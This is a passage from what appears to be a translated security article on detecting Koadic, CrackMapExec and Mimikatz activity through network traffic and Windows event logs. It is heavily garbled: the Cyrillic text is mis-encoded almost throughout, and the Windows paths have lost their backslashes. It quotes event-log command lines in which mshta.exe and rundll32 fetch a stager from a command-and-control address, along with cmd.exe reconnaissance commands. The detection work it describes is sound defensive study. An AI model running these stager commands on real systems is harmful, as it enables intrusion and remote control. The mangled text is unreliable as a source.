Π§Π΅ΡΡΠΎΠΏΠ°ΡΠΈ, ΡΠ΅Π²ΠΈΠ·ΠΈΡΠ°ΡΠ° Π½Π° WMI (Trace WMI-Activity), Π²ΠΎ ΡΠΈΠΈ Π½Π°ΡΡΠ°Π½ΠΈ ΠΌΠΎΠΆΠ΅ΡΠ΅ Π΄Π° Π½Π°ΡΠ΄Π΅ΡΠ΅ ΠΊΠΎΡΠΈΡΠ½ΠΈ ΠΈΠ½ΡΠΎΡΠΌΠ°ΡΠΈΠΈ Π·Π° WQL ΠΏΡΠ°ΡΠ°ΡΠ°, ΠΌΠΎΠΆΠ΅ Π΄Π° Π±ΠΈΠ΄Π΅ ΠΎΠ½Π΅Π²ΠΎΠ·ΠΌΠΎΠΆΠ΅Π½Π°. ΠΠΎ, Π°ΠΊΠΎ Π΅ ΠΎΠ²ΠΎΠ·ΠΌΠΎΠΆΠ΅Π½ΠΎ, ΡΠΎΠ³Π°Ρ Π°ΠΊΠΎ Π΅ ΠΈΠ·Π²ΡΡΠ΅Π½Π° ΡΠΊΡΠΈΠΏΡΠ°ΡΠ° enum_avproducts, ΡΠ΅ ΡΠ΅ Π·Π°ΡΡΠ²Π° Π½Π°ΡΡΠ°Π½ ΡΠΎ ID 11. ΠΠ΅ Π³ΠΎ ΡΠΎΠ΄ΡΠΆΠΈ ΠΈΠΌΠ΅ΡΠΎ Π½Π° ΠΊΠΎΡΠΈΡΠ½ΠΈΠΊΠΎΡ ΠΊΠΎΡ Π³ΠΎ ΠΈΡΠΏΡΠ°ΡΠΈΠ» Π±Π°ΡΠ°ΡΠ΅ΡΠΎ ΠΈ ΠΈΠΌΠ΅ΡΠΎ Π²ΠΎ ΠΈΠΌΠ΅Π½ΡΠΊΠΈΠΎΡ ΠΏΡΠΎΡΡΠΎΡ rootSecurityCenter2.
Π‘Π΅ΠΊΠΎΡ ΠΎΠ΄ CME ΠΌΠΎΠ΄ΡΠ»ΠΈΡΠ΅ ΠΈΠΌΠ°ΡΠ΅ ΡΠ²ΠΎΠΈ Π°ΡΡΠ΅ΡΠ°ΠΊΡΠΈ, Π±ΠΈΠ»ΠΎ Π΄Π° Π΅ ΡΠΎΠ° ΡΠΏΠ΅ΡΠΈΡΠΈΡΠ½ΠΈ WQL ΠΏΡΠ°ΡΠ°ΡΠ° ΠΈΠ»ΠΈ ΡΠΎΠ·Π΄Π°Π²Π°ΡΠ΅ Π½Π° ΠΎΠ΄ΡΠ΅Π΄Π΅Π½ ΡΠΈΠΏ Π½Π° Π·Π°Π΄Π°ΡΠΈ Π²ΠΎ ΡΠ°ΡΠΏΠΎΡΠ΅Π΄ΡΠ²Π°Ρ Π½Π° Π·Π°Π΄Π°ΡΠΈ ΡΠΎ Π·Π°ΠΌΠ°ΡΡΠ²Π°ΡΠ΅ ΠΈ Π°ΠΊΡΠΈΠ²Π½ΠΎΡΡ ΡΠΏΠ΅ΡΠΈΡΠΈΡΠ½Π° Π·Π° Bloodhound Π²ΠΎ LDAP ΠΈ SMB.
ΠΠΠΠΠΠ
ΠΠΎΡΠ΅Π±Π½Π° ΠΊΠ°ΡΠ°ΠΊΡΠ΅ΡΠΈΡΡΠΈΠΊΠ° Π½Π° Koadic Π΅ ΡΠΏΠΎΡΡΠ΅Π±Π°ΡΠ° Π½Π° JavaScript ΠΈ VBScript ΡΠΎΠ»ΠΊΡΠ²Π°ΡΠΈ Π²Π³ΡΠ°Π΄Π΅Π½ΠΈ Π²ΠΎ Windows. ΠΠΎ ΠΎΠ²Π°Π° ΡΠΌΠΈΡΠ»Π°, ΡΠΎΡ Π³ΠΎ ΡΠ»Π΅Π΄ΠΈ ΡΡΠ΅Π½Π΄ΠΎΡ Π½Π° ΠΆΠΈΠ²Π΅Π΅ΡΠ΅ Π½Π°Π΄Π²ΠΎΡ ΠΎΠ΄ Π·Π΅ΠΌΡΠ°ΡΠ° - ΠΎΠ΄Π½ΠΎΡΠ½ΠΎ Π½Π΅ΠΌΠ° Π½Π°Π΄Π²ΠΎΡΠ΅ΡΠ½ΠΈ Π·Π°Π²ΠΈΡΠ½ΠΎΡΡΠΈ ΠΈ ΠΊΠΎΡΠΈΡΡΠΈ ΡΡΠ°Π½Π΄Π°ΡΠ΄Π½ΠΈ Π°Π»Π°ΡΠΊΠΈ Π·Π° Windows. ΠΠ²Π° Π΅ Π°Π»Π°ΡΠΊΠ° Π·Π° ΡΠ΅Π»ΠΎΡΠ½Π° ΠΊΠΎΠΌΠ°Π½Π΄Π° ΠΈ ΠΊΠΎΠ½ΡΡΠΎΠ»Π° (CnC), Π±ΠΈΠ΄Π΅ΡΡΠΈ ΠΏΠΎ ΠΈΠ½ΡΠ΅ΠΊΡΠΈΡΠ°ΡΠ° Π½Π° ΠΌΠ°ΡΠΈΠ½Π°ΡΠ° Π΅ ΠΈΠ½ΡΡΠ°Π»ΠΈΡΠ°Π½ βΠΈΠΌΠΏΠ»Π°Π½Ρβ ΡΡΠΎ ΠΎΠ²ΠΎΠ·ΠΌΠΎΠΆΡΠ²Π° Π΄Π° ΡΠ΅ ΠΊΠΎΠ½ΡΡΠΎΠ»ΠΈΡΠ°. Π’Π°ΠΊΠ²Π°ΡΠ° ΠΌΠ°ΡΠΈΠ½Π°, Π²ΠΎ ΠΊΠΎΠ°Π΄ΡΠΊΠ°ΡΠ° ΡΠ΅ΡΠΌΠΈΠ½ΠΎΠ»ΠΎΠ³ΠΈΡΠ°, ΡΠ΅ Π½Π°ΡΠ΅ΠΊΡΠ²Π° βΠ·ΠΎΠΌΠ±ΠΈβ. ΠΠΎΠΊΠΎΠ»ΠΊΡ Π½Π΅ΠΌΠ° Π΄ΠΎΠ²ΠΎΠ»Π½ΠΎ ΠΏΡΠΈΠ²ΠΈΠ»Π΅Π³ΠΈΠΈ Π·Π° ΡΠ΅Π»ΠΎΡΠ½Π° ΠΎΠΏΠ΅ΡΠ°ΡΠΈΡΠ° ΠΎΠ΄ ΡΡΡΠ°Π½Π°ΡΠ° Π½Π° ΠΆΡΡΠ²Π°ΡΠ°, Koadic ΠΈΠΌΠ° ΠΌΠΎΠΆΠ½ΠΎΡΡ Π΄Π° Π³ΠΈ ΠΏΠΎΠ΄ΠΈΠ³Π½Π΅ ΠΊΠΎΡΠΈΡΡΠ΅ΡΡΠΈ ΡΠ΅Ρ Π½ΠΈΠΊΠΈ Π·Π° Π±Π°ΡΠΏΠ°Ρ Π·Π° ΠΊΠΎΠ½ΡΡΠΎΠ»Π° Π½Π° ΠΊΠΎΡΠΈΡΠ½ΠΈΡΠΊΠ° ΡΠΌΠ΅ΡΠΊΠ° (UAC bypass).
ΠΡΠΈΠ·. 10. ΠΠΎΠ°Π΄ΠΈΡΠ½Π° ΡΠΊΠΎΠ»ΠΊΠ°
ΠΡΡΠ²Π°ΡΠ° ΠΌΠΎΡΠ° Π΄Π° Π·Π°ΠΏΠΎΡΠ½Π΅ ΠΊΠΎΠΌΡΠ½ΠΈΠΊΠ°ΡΠΈΡΠ° ΡΠΎ ΡΠ΅ΡΠ²Π΅ΡΠΎΡ Command & Control. ΠΠ° Π΄Π° Π³ΠΎ Π½Π°ΠΏΡΠ°Π²ΠΈΡΠ΅ ΠΎΠ²Π°, ΡΠ°Π° ΡΡΠ΅Π±Π° Π΄Π° ΠΊΠΎΠ½ΡΠ°ΠΊΡΠΈΡΠ° ΡΠΎ ΠΏΡΠ΅ΡΡ ΠΎΠ΄Π½ΠΎ ΠΏΠΎΠ΄Π³ΠΎΡΠ²Π΅Π½ URI ΠΈ Π΄Π° Π³ΠΎ ΠΏΡΠΈΠΌΠΈ Π³Π»Π°Π²Π½ΠΎΡΠΎ ΡΠ΅Π»ΠΎ Π½Π° Koadic ΠΊΠΎΡΠΈΡΡΠ΅ΡΡΠΈ Π΅Π΄Π΅Π½ ΠΎΠ΄ ΡΡΠ΅Π½Π°ΡΠΈΡΡΠΈΡΠ΅. ΠΠ° ΡΠ». Π‘Π»ΠΈΠΊΠ° 11 ΠΏΠΎΠΊΠ°ΠΆΡΠ²Π° ΠΏΡΠΈΠΌΠ΅Ρ Π·Π° ΠΌΡΡΠ° ΡΡΠ΅ΡΡΠ΅ΡΠΎΡ.
ΠΡΠΈΠ·. 11. ΠΠ½ΠΈΡΠΈΡΠ°Π»ΠΈΠ·ΠΈΡΠ°ΡΠ΅ Π½Π° ΡΠ΅ΡΠΈΡΠ° ΡΠΎ CnC ΡΠ΅ΡΠ²Π΅ΡΠΎΡ
ΠΡΠ· ΠΎΡΠ½ΠΎΠ²Π° Π½Π° ΠΏΡΠΎΠΌΠ΅Π½Π»ΠΈΠ²Π°ΡΠ° Π·Π° ΠΎΠ΄Π³ΠΎΠ²ΠΎΡ WS, ΡΡΠ°Π½ΡΠ²Π° ΡΠ°ΡΠ½ΠΎ Π΄Π΅ΠΊΠ° ΠΈΠ·Π²ΡΡΡΠ²Π°ΡΠ΅ΡΠΎ ΡΠ΅ ΡΠ»ΡΡΡΠ²Π° ΠΏΡΠ΅ΠΊΡ WScript.Shell, Π° ΠΏΡΠΎΠΌΠ΅Π½Π»ΠΈΠ²ΠΈΡΠ΅ STAGER, SESSIONKEY, JOBKEY, JOBKEYPATH, EXPIRE ΡΠΎΠ΄ΡΠΆΠ°Ρ ΠΊΠ»ΡΡΠ½ΠΈ ΠΈΠ½ΡΠΎΡΠΌΠ°ΡΠΈΠΈ Π·Π° ΠΏΠ°ΡΠ°ΠΌΠ΅ΡΡΠΈΡΠ΅ Π½Π° ΡΠ΅ΠΊΠΎΠ²Π½Π°ΡΠ° ΡΠ΅ΡΠΈΡΠ°. ΠΠ²Π° Π΅ ΠΏΡΠ²ΠΈΠΎΡ ΠΏΠ°Ρ Π±Π°ΡΠ°ΡΠ΅-ΠΎΠ΄Π³ΠΎΠ²ΠΎΡ Π²ΠΎ HTTP Π²ΡΡΠΊΠ° ΡΠΎ CnC ΡΠ΅ΡΠ²Π΅Ρ. ΠΠΎΡΠ»Π΅Π΄ΠΎΠ²Π°ΡΠ΅Π»Π½ΠΈΡΠ΅ Π±Π°ΡΠ°ΡΠ° ΡΠ΅ Π΄ΠΈΡΠ΅ΠΊΡΠ½ΠΎ ΠΏΠΎΠ²ΡΠ·Π°Π½ΠΈ ΡΠΎ ΡΡΠ½ΠΊΡΠΈΠΎΠ½Π°Π»Π½ΠΎΡΡΠ° Π½Π° ΠΏΠΎΠ²ΠΈΠΊΠ°Π½ΠΈΡΠ΅ ΠΌΠΎΠ΄ΡΠ»ΠΈ (ΠΈΠΌΠΏΠ»Π°Π½ΡΠΈΡΠ΅). Π‘ΠΈΡΠ΅ Koadic ΠΌΠΎΠ΄ΡΠ»ΠΈ ΡΠ°Π±ΠΎΡΠ°Ρ ΡΠ°ΠΌΠΎ ΡΠΎ Π°ΠΊΡΠΈΠ²Π½Π° ΡΠ΅ΡΠΈΡΠ° ΡΠΎ CnC.
Mimikatz
ΠΡΡΠΎ ΠΊΠ°ΠΊΠΎ ΡΡΠΎ CME ΡΠ°Π±ΠΎΡΠΈ ΡΠΎ Bloodhound, Koadic ΡΠ°Π±ΠΎΡΠΈ ΡΠΎ Mimikatz ΠΊΠ°ΠΊΠΎ ΠΏΠΎΡΠ΅Π±Π½Π° ΠΏΡΠΎΠ³ΡΠ°ΠΌΠ° ΠΈ ΠΈΠΌΠ° ΠΏΠΎΠ²Π΅ΡΠ΅ Π½Π°ΡΠΈΠ½ΠΈ Π΄Π° ΡΠ° ΡΡΠ°ΡΡΡΠ²Π°. ΠΠΎΠ΄ΠΎΠ»Ρ Π΅ ΠΏΠ°ΡΠΎΡ Π±Π°ΡΠ°ΡΠ΅-ΠΎΠ΄Π³ΠΎΠ²ΠΎΡ Π·Π° ΠΏΡΠ΅Π·Π΅ΠΌΠ°ΡΠ΅ Π½Π° ΠΈΠΌΠΏΠ»Π°Π½ΡΠΎΡ Mimikatz.
ΠΡΠΈΠ·. 12. Π’ΡΠ°Π½ΡΡΠ΅Ρ Π½Π° ΠΠΈΠΌΠΈΠΊΠ°ΡΡ Π²ΠΎ ΠΠΎΠ°Π΄ΠΈΡ
ΠΠΎΠΆΠ΅ΡΠ΅ Π΄Π° Π²ΠΈΠ΄ΠΈΡΠ΅ ΠΊΠ°ΠΊΠΎ ΡΠ΅ ΠΏΡΠΎΠΌΠ΅Π½ΠΈ ΡΠΎΡΠΌΠ°ΡΠΎΡ URI Π²ΠΎ Π±Π°ΡΠ°ΡΠ΅ΡΠΎ. Π‘Π΅Π³Π° ΡΠΎΠ΄ΡΠΆΠΈ Π²ΡΠ΅Π΄Π½ΠΎΡΡ Π·Π° ΠΏΡΠΎΠΌΠ΅Π½Π»ΠΈΠ²Π°ΡΠ° csrf, ΠΊΠΎΡΠ° Π΅ ΠΎΠ΄Π³ΠΎΠ²ΠΎΡΠ½Π° Π·Π° ΠΈΠ·Π±ΡΠ°Π½ΠΈΠΎΡ ΠΌΠΎΠ΄ΡΠ». ΠΠ΅ ΠΎΠ±ΡΠ½ΡΠ²Π°ΡΡΠ΅ Π²Π½ΠΈΠΌΠ°Π½ΠΈΠ΅ Π½Π° Π½Π΅ΡΠ·ΠΈΠ½ΠΎΡΠΎ ΠΈΠΌΠ΅; Π‘ΠΈΡΠ΅ Π·Π½Π°Π΅ΠΌΠ΅ Π΄Π΅ΠΊΠ° CSRF ΠΎΠ±ΠΈΡΠ½ΠΎ ΡΠ΅ ΡΠ°Π·Π±ΠΈΡΠ° ΠΏΠΎΠΈΠ½Π°ΠΊΡ. ΠΠ΄Π³ΠΎΠ²ΠΎΡΠΎΡ Π±Π΅ΡΠ΅ ΠΈΡΡΠΎΡΠΎ Π³Π»Π°Π²Π½ΠΎ ΡΠ΅Π»ΠΎ Π½Π° ΠΠΎΠ°Π΄ΠΈΡ, Π½Π° ΠΊΠΎΠ΅ Π±Π΅ΡΠ΅ Π΄ΠΎΠ΄Π°Π΄Π΅Π½ ΠΊΠΎΠ΄ ΠΏΠΎΠ²ΡΠ·Π°Π½ ΡΠΎ ΠΠΈΠΌΠΈΠΊΠ°Ρ. Π’ΠΎΡ Π΅ Π΄ΠΎΡΡΠ° Π³ΠΎΠ»Π΅ΠΌ, ΠΏΠ° Π΄Π° Π³ΠΈ ΠΏΠΎΠ³Π»Π΅Π΄Π½Π΅ΠΌΠ΅ ΠΊΠ»ΡΡΠ½ΠΈΡΠ΅ ΡΠΎΡΠΊΠΈ. ΠΠ²Π΄Π΅ ΡΠ° ΠΈΠΌΠ°ΠΌΠ΅ Π±ΠΈΠ±Π»ΠΈΠΎΡΠ΅ΠΊΠ°ΡΠ° Mimikatz ΠΊΠΎΠ΄ΠΈΡΠ°Π½Π° Π²ΠΎ base64, ΡΠ΅ΡΠΈΡΠΊΠ° .NET ΠΊΠ»Π°ΡΠ° ΠΊΠΎΡΠ° ΡΠ΅ ΡΠ° ΠΈΠ½ΡΠ΅ΠΊΡΠΈΡΠ° ΠΈ Π°ΡΠ³ΡΠΌΠ΅Π½ΡΠΈ Π·Π° Π»Π°Π½ΡΠΈΡΠ°ΡΠ΅ Π½Π° Mimikatz. Π Π΅Π·ΡΠ»ΡΠ°ΡΠΎΡ ΠΎΠ΄ ΠΈΠ·Π²ΡΡΡΠ²Π°ΡΠ΅ΡΠΎ ΡΠ΅ ΠΏΡΠ΅Π½Π΅ΡΡΠ²Π° ΠΏΡΠ΅ΠΊΡ ΠΌΡΠ΅ΠΆΠ°ΡΠ° Π²ΠΎ ΡΠ°ΡΠ΅Π½ ΡΠ΅ΠΊΡΡ.
ΠΡΠΈΠ·. 13. Π Π΅Π·ΡΠ»ΡΠ°Ρ ΠΎΠ΄ ΠΈΠ·Π²ΡΡΡΠ²Π°ΡΠ΅ Π½Π° Mimikatz Π½Π° Π΄Π°Π»Π΅ΡΠΈΠ½ΡΠΊΠ° ΠΌΠ°ΡΠΈΠ½Π°
Exec_cmd
Koadic ΠΈΠΌΠ° ΠΈ ΠΌΠΎΠ΄ΡΠ»ΠΈ ΠΊΠΎΠΈ ΠΌΠΎΠΆΠ°Ρ Π΄Π° ΠΈΠ·Π²ΡΡΡΠ²Π°Π°Ρ ΠΊΠΎΠΌΠ°Π½Π΄ΠΈ ΠΎΠ΄ Π΄Π°Π»Π΅ΡΠΈΠ½Π°. ΠΠ²Π΄Π΅ ΡΠ΅ Π³ΠΎ Π²ΠΈΠ΄ΠΈΠΌΠ΅ ΠΈΡΡΠΈΠΎΡ ΠΌΠ΅ΡΠΎΠ΄ Π·Π° Π³Π΅Π½Π΅ΡΠΈΡΠ°ΡΠ΅ URI ΠΈ ΠΏΠΎΠ·Π½Π°ΡΠΈΡΠ΅ sid ΠΈ csrf ΠΏΡΠΎΠΌΠ΅Π½Π»ΠΈΠ²ΠΈ. ΠΠΎ ΡΠ»ΡΡΠ°ΡΠΎΡ Π½Π° ΠΌΠΎΠ΄ΡΠ»ΠΎΡ exec_cmd, ΠΊΠΎΠ΄ΠΎΡ ΡΠ΅ Π΄ΠΎΠ΄Π°Π²Π° Π½Π° ΡΠ΅Π»ΠΎΡΠΎ ΡΡΠΎ Π΅ ΡΠΏΠΎΡΠΎΠ±Π½ΠΎ Π΄Π° ΠΈΠ·Π²ΡΡΡΠ²Π° ΠΊΠΎΠΌΠ°Π½Π΄ΠΈ Π½Π° ΡΠΊΠΎΠ»ΠΊΠ°. ΠΠΎΠ΄ΠΎΠ»Ρ Π΅ ΠΏΡΠΈΠΊΠ°ΠΆΠ°Π½ ΡΠ°ΠΊΠΎΠ² ΠΊΠΎΠ΄ ΡΠΎΠ΄ΡΠΆΠ°Π½ Π²ΠΎ HTTP ΠΎΠ΄Π³ΠΎΠ²ΠΎΡΠΎΡ Π½Π° CnC ΡΠ΅ΡΠ²Π΅ΡΠΎΡ.
ΠΡΠΈΠ·. 14. ΠΠΎΠ΄ Π½Π° ΠΈΠΌΠΏΠ»Π°Π½Ρ exec_cmd
ΠΡΠΎΠΌΠ΅Π½Π»ΠΈΠ²Π°ΡΠ° GAWTUUGCFI ΡΠΎ ΠΏΠΎΠ·Π½Π°ΡΠΈΠΎΡ Π°ΡΡΠΈΠ±ΡΡ WS Π΅ ΠΏΠΎΡΡΠ΅Π±Π½Π° Π·Π° ΠΈΠ·Π²ΡΡΡΠ²Π°ΡΠ΅ Π½Π° ΠΊΠΎΠ΄ΠΎΡ. Π‘ΠΎ Π½Π΅Π³ΠΎΠ²Π° ΠΏΠΎΠΌΠΎΡ, ΠΈΠΌΠΏΠ»Π°Π½ΡΠΎΡ ΡΠ° ΠΏΠΎΠ²ΠΈΠΊΡΠ²Π° ΡΠΊΠΎΠ»ΠΊΠ°ΡΠ°, ΠΎΠ±ΡΠ°Π±ΠΎΡΡΠ²Π°ΡΡΠΈ Π΄Π²Π΅ Π³ΡΠ°Π½ΠΊΠΈ Π½Π° ΠΊΠΎΠ΄ - shell.exec ΡΠΎ Π²ΡΠ°ΡΠ°ΡΠ΅ Π½Π° ΠΈΠ·Π»Π΅Π·Π½ΠΈΠΎΡ ΠΏΠΎΡΠΎΠΊ Π½Π° ΠΏΠΎΠ΄Π°ΡΠΎΡΠΈ ΠΈ shell.run Π±Π΅Π· Π²ΡΠ°ΡΠ°ΡΠ΅.
Koadic Π½Π΅ Π΅ ΡΠΈΠΏΠΈΡΠ½Π° Π°Π»Π°ΡΠΊΠ°, Π½ΠΎ ΠΈΠΌΠ° ΡΠ²ΠΎΠΈ Π°ΡΡΠ΅ΡΠ°ΠΊΡΠΈ ΡΠΎ ΠΊΠΎΠΈ ΠΌΠΎΠΆΠ΅ Π΄Π° ΡΠ΅ Π½Π°ΡΠ΄Π΅ Π²ΠΎ Π»Π΅Π³ΠΈΡΠΈΠΌΠ΅Π½ ΡΠΎΠΎΠ±ΡΠ°ΡΠ°Ρ:
- ΡΠΏΠ΅ΡΠΈΡΠ°Π»Π½ΠΎ ΡΠΎΡΠΌΠΈΡΠ°ΡΠ΅ Π½Π° HTTP Π±Π°ΡΠ°ΡΠ°,
- ΠΊΠΎΡΠΈΡΡΠ΅ΡΡΠΈ winHttpRequests API,
- ΡΠΎΠ·Π΄Π°Π²Π°ΡΠ΅ Π½Π° ΠΎΠ±ΡΠ΅ΠΊΡ WScript.Shell ΠΏΡΠ΅ΠΊΡ ActiveXObject,
- Π³ΠΎΠ»Π΅ΠΌΠΎ ΠΈΠ·Π²ΡΡΠ½ΠΎ ΡΠ΅Π»ΠΎ.
ΠΠΎΡΠ΅ΡΠ½Π°ΡΠ° Π²ΡΡΠΊΠ° Π΅ ΠΈΠ½ΠΈΡΠΈΡΠ°Π½Π° ΠΎΠ΄ ΡΡΠ΅ΡΡΠ΅ΡΠΎΡ, ΡΠ°ΠΊΠ° ΡΡΠΎ Π΅ ΠΌΠΎΠΆΠ½ΠΎ Π΄Π° ΡΠ΅ ΠΎΡΠΊΡΠΈΠ΅ Π½Π΅Π³ΠΎΠ²Π°ΡΠ° Π°ΠΊΡΠΈΠ²Π½ΠΎΡΡ ΠΏΡΠ΅ΠΊΡ Π½Π°ΡΡΠ°Π½ΠΈ Π½Π° Windows. ΠΠ° mshta, ΠΎΠ²Π° Π΅ Π½Π°ΡΡΠ°Π½ 4688, ΡΡΠΎ ΡΠΊΠ°ΠΆΡΠ²Π° Π½Π° ΡΠΎΠ·Π΄Π°Π²Π°ΡΠ΅ ΠΏΡΠΎΡΠ΅Ρ ΡΠΎ Π°ΡΡΠΈΠ±ΡΡ Π·Π° ΠΏΠΎΡΠ΅ΡΠΎΠΊ:
C:Windowssystem32mshta.exe http://192.168.211.1:9999/dXpT6
ΠΠΎΠ΄Π΅ΠΊΠ° ΡΠ°Π±ΠΎΡΠΈ Koadic, ΠΌΠΎΠΆΠ΅ΡΠ΅ Π΄Π° Π²ΠΈΠ΄ΠΈΡΠ΅ Π΄ΡΡΠ³ΠΈ 4688 Π½Π°ΡΡΠ°Π½ΠΈ ΡΠΎ Π°ΡΡΠΈΠ±ΡΡΠΈ ΠΊΠΎΠΈ ΡΠΎΠ²ΡΡΠ΅Π½ΠΎ Π³ΠΎ ΠΊΠ°ΡΠ°ΠΊΡΠ΅ΡΠΈΠ·ΠΈΡΠ°Π°Ρ:
rundll32.exe http://192.168.241.1:9999/dXpT6?sid=1dbef04007a64fba83edb3f3928c9c6c; csrf=;......mshtml,RunHTMLApplication
rundll32.exe http://192.168.202.136:9999/dXpT6?sid=12e0bbf6e9e5405690e5ede8ed651100;csrf=18f93a28e0874f0d8d475d154bed1983;......mshtml,RunHTMLApplication
"C:Windowssystem32cmd.exe" /q /c chcp 437 & net session 1> C:Usersuser02AppDataLocalTemp6dc91b53-ddef-2357-4457-04a3c333db06.txt 2>&1
"C:Windowssystem32cmd.exe" /q /c chcp 437 & ipconfig 1> C:Usersuser02AppDataLocalTemp721d2d0a-890f-9549-96bd-875a495689b7.txt 2>&1
ΠΠ°ΠΎΠ΄ΠΈ
Π’ΡΠ΅Π½Π΄ΠΎΡ Π·Π° ΠΆΠΈΠ²Π΅Π΅ΡΠ΅ ΠΎΠ΄ Π·Π΅ΠΌΡΠΈΡΡΠ΅ΡΠΎ ΡΠ΅ Π·Π΄ΠΎΠ±ΠΈΠ²Π° ΡΠΎ ΠΏΠΎΠΏΡΠ»Π°ΡΠ½ΠΎΡΡ ΠΌΠ΅ΡΡ ΠΊΡΠΈΠΌΠΈΠ½Π°Π»ΡΠΈΡΠ΅. Π’ΠΈΠ΅ Π³ΠΈ ΠΊΠΎΡΠΈΡΡΠ°Ρ Π°Π»Π°ΡΠΊΠΈΡΠ΅ ΠΈ ΠΌΠ΅Ρ
Π°Π½ΠΈΠ·ΠΌΠΈΡΠ΅ Π²Π³ΡΠ°Π΄Π΅Π½ΠΈ Π²ΠΎ Windows Π·Π° Π½ΠΈΠ²Π½ΠΈΡΠ΅ ΠΏΠΎΡΡΠ΅Π±ΠΈ. ΠΠ»Π΅Π΄Π°ΠΌΠ΅ ΠΏΠΎΠΏΡΠ»Π°ΡΠ½ΠΈ Π°Π»Π°ΡΠΊΠΈ Koadic, CrackMapExec ΠΈ Impacket ΠΊΠΎΠΈ Π³ΠΎ ΡΠ»Π΅Π΄Π°Ρ ΠΎΠ²ΠΎΡ ΠΏΡΠΈΠ½ΡΠΈΠΏ ΡΓ¨ ΠΏΠΎΡΠ΅ΡΡΠΎ ΡΠ΅ ΠΏΠΎΡΠ°Π²ΡΠ²Π°Π°Ρ Π²ΠΎ ΠΈΠ·Π²Π΅ΡΡΠ°ΠΈΡΠ΅ Π½Π° APT. Π Π°ΡΡΠ΅ ΠΈ Π±ΡΠΎΡΠΎΡ Π½Π° Π²ΠΈΠ»ΡΡΠΊΠΈ Π½Π° GitHub Π·Π° ΠΎΠ²ΠΈΠ΅ Π°Π»Π°ΡΠΊΠΈ, Π° ΡΠ΅ ΠΏΠΎΡΠ°Π²ΡΠ²Π°Π°Ρ ΠΈ Π½ΠΎΠ²ΠΈ (ΡΠ΅Π³Π° Π²Π΅ΡΠ΅ Π³ΠΈ ΠΈΠΌΠ° ΠΎΠΊΠΎΠ»Ρ ΠΈΠ»ΡΠ°Π΄Π°). Π’ΡΠ΅Π½Π΄ΠΎΡ Π΄ΠΎΠ±ΠΈΠ²Π° Π½Π° ΠΏΠΎΠΏΡΠ»Π°ΡΠ½ΠΎΡΡ ΠΏΠΎΡΠ°Π΄ΠΈ Π½Π΅Π³ΠΎΠ²Π°ΡΠ° Π΅Π΄Π½ΠΎΡΡΠ°Π²Π½ΠΎΡΡ: Π½Π° Π½Π°ΠΏΠ°ΡΠ°ΡΠΈΡΠ΅ Π½Π΅ ΠΈΠΌ ΡΠ΅ ΠΏΠΎΡΡΠ΅Π±Π½ΠΈ Π°Π»Π°ΡΠΊΠΈ ΠΎΠ΄ ΡΡΠ΅ΡΠΈ ΡΡΡΠ°Π½ΠΈ; ΡΠΈΠ΅ Π²Π΅ΡΠ΅ ΡΠ΅ Π½Π° ΠΌΠ°ΡΠΈΠ½ΠΈΡΠ΅ Π½Π° ΠΆΡΡΠ²ΠΈΡΠ΅ ΠΈ ΠΈΠΌ ΠΏΠΎΠΌΠ°Π³Π°Π°Ρ Π΄Π° Π³ΠΈ Π·Π°ΠΎΠ±ΠΈΠΊΠΎΠ»Π°Ρ Π±Π΅Π·Π±Π΅Π΄Π½ΠΎΡΠ½ΠΈΡΠ΅ ΠΌΠ΅ΡΠΊΠΈ. Π‘Π΅ ΡΠΎΠΊΡΡΠΈΡΠ°ΠΌΠ΅ Π½Π° ΠΏΡΠΎΡΡΡΠ²Π°ΡΠ΅ Π½Π° ΠΌΡΠ΅ΠΆΠ½Π°ΡΠ° ΠΊΠΎΠΌΡΠ½ΠΈΠΊΠ°ΡΠΈΡΠ°: ΡΠ΅ΠΊΠΎΡΠ° Π°Π»Π°ΡΠΊΠ° ΠΎΠΏΠΈΡΠ°Π½Π° ΠΏΠΎΠ³ΠΎΡΠ΅ ΠΎΡΡΠ°Π²Π° ΡΠ²ΠΎΠΈ ΡΡΠ°Π³ΠΈ Π²ΠΎ ΠΌΡΠ΅ΠΆΠ½ΠΈΠΎΡ ΡΠΎΠΎΠ±ΡΠ°ΡΠ°Ρ; Π΄Π΅ΡΠ°Π»Π½ΠΎΡΠΎ ΠΏΡΠΎΡΡΡΠ²Π°ΡΠ΅ Π½Π° Π½ΠΈΠ² Π½ΠΈ ΠΎΠ²ΠΎΠ·ΠΌΠΎΠΆΠΈ Π΄Π° Π³ΠΎ Π½Π°ΡΡΠΈΠΌΠ΅ Π½Π°ΡΠΈΠΎΡ ΠΏΡΠΎΠΈΠ·Π²ΠΎΠ΄
ΠΠ²ΡΠΎΡΠΈ:
- ΠΠ½ΡΠΎΠ½ Π’ΡΡΡΠΈΠ½, ΡΠ°ΠΊΠΎΠ²ΠΎΠ΄ΠΈΡΠ΅Π» Π½Π° ΠΠ΄Π΄Π΅Π»ΠΎΡ Π·Π° Π΅ΠΊΡΠΏΠ΅ΡΡΡΠΊΠΈ ΡΡΠ»ΡΠ³ΠΈ, ΠΠΊΡΠΏΠ΅ΡΡΡΠΊΠΈ Π±Π΅Π·Π±Π΅Π΄Π½ΠΎΡΠ΅Π½ ΡΠ΅Π½ΡΠ°Ρ Π½Π° ΠΠ’, ΠΠΎΠ·ΠΈΡΠΈΠ²Π½ΠΈ ΡΠ΅Ρ Π½ΠΎΠ»ΠΎΠ³ΠΈΠΈ
- ΠΠ³ΠΎΡ ΠΠΎΠ΄ΠΌΠΎΠΊΠΎΠ², Π΅ΠΊΡΠΏΠ΅ΡΡ, ΠΠ’ ΠΠΊΡΠΏΠ΅ΡΡΡΠΊΠΈ Π±Π΅Π·Π±Π΅Π΄Π½ΠΎΡΠ΅Π½ ΡΠ΅Π½ΡΠ°Ρ, ΠΠΎΠ·ΠΈΡΠΈΠ²Π½ΠΈ ΡΠ΅Ρ Π½ΠΎΠ»ΠΎΠ³ΠΈΠΈ
ΠΠ·Π²ΠΎΡ: www.habr.com